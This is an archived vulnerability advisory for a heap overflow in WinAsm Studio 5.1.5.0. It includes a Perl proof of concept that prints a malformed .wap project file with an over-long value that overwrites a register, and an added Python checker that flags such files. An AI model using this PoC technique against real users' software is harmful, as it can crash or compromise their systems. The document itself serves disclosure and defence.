WinAsm Studio 5.1.5.0 Local Heap Overflow PoC

2009.03.24
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl
# WinAsm Studio 5.1.5.0 Local Heap Overflow PoC
# By Mountassif Moad
# D0wnload : http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=182&file=WinAsm515Full.zip
# Greatz : Simo-Soft - Skd - fl0 fl0w - Str0ke & By By milw0rm :d
#
# Registers
# EAX 00000001
# ECX 00000001
# EDX 0013F814
# EBX 42424242 ( EBX overwritten :d )
# ESP 0013FBDC
# EBP 0013FE3C
# ESI 0013FBF7
# EDI 0013FD2F ASCII "BBBBBBBBBB" (next chars in EDI :d )
# EIP 0040A927 WinAsm.0040A927
use strict;
use warnings;

# Project file body: "[FILES]\r1=" followed by the over-long value
# (227 x 'A' filler, 4 x 'B' landing in EBX, 20 x 'C'), then the
# remaining [PROJECT] and [MAKE] sections of a normal .wap file.
my $m = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D\x31\x3D" .
        "\x41" x 227 . "\x42" x 4 . "\x43" x 20 .
        "\x0D\x5B\x50\x52" .
        "\x4F\x4A\x45\x43\x54\x5D\x0D\x54\x79\x70\x65\x3D\x0D\x52" .
        "\x65\x6C\x65\x61\x73\x65\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E" .
        "\x65\x3D\x0D\x44\x65\x62\x75\x67\x43\x6F\x6D\x6D\x61\x6E\x64" .
        "\x4C\x69\x6E\x65\x3D\x0D\x41\x75\x74\x6F\x49\x6E\x63\x46\x69" .
        "\x6C\x65\x56\x65\x72\x73\x69\x6F\x6E\x3D\x30\x0D\x52\x43\x53" .
        "\x69\x6C\x65\x6E\x74\x3D\x30\x0D\x50\x65\x6C\x6C\x65\x73\x54" .
        "\x6F\x6F\x6C\x73\x3D\x30\x0D\x5B\x4D\x41\x4B\x45\x5D\x0D" .
        "\x41\x63\x74\x69\x76\x65\x42\x75\x69\x6C\x64\x3D\x30\x0D\x43" .
        "\x6F\x6D\x70\x69\x6C\x65\x52\x43\x3D\x0D\x52\x43\x54\x6F\x4F" .
        "\x62\x6A\x3D\x0D\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63" .
        "\x0D\x4C\x69\x6E\x6B\x3D\x0D\x4F\x75\x74\x3D\x0D\x44" .
        "\x65\x62\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63\x0D\x44" .
        "\x65\x62\x4C\x69\x6E\x6B\x3D\x0D\x44\x65\x62\x4F\x75\x74\x3D";

print $m;
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++ WinAsm Studio 5.1.5.0 Local Heap Overflow PoC +++\n";
print " +++ Written By Stack +++\n";
print " +++ Usage Ex.: perl $0 >>Exploit.wap +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;
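Added defender-side example, not part of the advisory or of WinAsm Studio: a checker that parses the CR-separated [SECTION]/key=value layout the PoC emits and flags any value reaching the 227-byte filler length at which the PoC overwrites the saved EBX. The section and key structure is inferred from the PoC bytes, and the sample files are constructed here.

```python
# Added example (not the advisory's code): flag over-long values in a
# WinAsm Studio .wap project file before opening it in the IDE.
# Threshold and layout are taken from the PoC above; the file format is
# inferred from the PoC bytes, not from WinAsm documentation (assumption).
import re

OVERFLOW_LEN = 227  # filler bytes before the saved EBX is clobbered in the PoC


def parse_wap(data: bytes) -> dict:
    """Parse [SECTION] headers and key=value lines separated by CR or LF."""
    sections: dict = {}
    current = None
    for raw in re.split(rb"\r\n|\r|\n", data):
        line = raw.strip()
        if not line:
            continue
        if line.startswith(b"[") and line.endswith(b"]"):
            current = line[1:-1].decode("latin-1")
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition(b"=")
        if current is None or not sep:
            continue  # stray line outside a section or without '='
        sections[current][key.decode("latin-1")] = value
    return sections


def find_overlong_values(data: bytes, limit: int = OVERFLOW_LEN) -> list:
    """Return (section, key, length) for every value at or above the limit."""
    hits = []
    for section, entries in parse_wap(data).items():
        for key, value in entries.items():
            if len(value) >= limit:
                hits.append((section, key, len(value)))
    return hits


# Constructed samples: a benign project file and one shaped like the PoC.
BENIGN_WAP = b"[FILES]\r1=main.asm\r[PROJECT]\rType=\rAutoIncFileVersion=0\r"
MALFORMED_WAP = (b"[FILES]\r1=" + b"A" * 227 + b"B" * 4 + b"C" * 20
                 + b"\r[PROJECT]\rType=\r")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WAP), ("malformed", MALFORMED_WAP)):
        print(name, find_overlong_values(blob))  # malformed -> [('FILES', '1', 251)]
```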

References:

http://xforce.iss.net/xforce/xfdb/49266
http://www.securityfocus.com/bid/34132
http://www.milw0rm.com/exploits/8224
http://secunia.com/advisories/34309


Copyright 2019, cxsecurity.com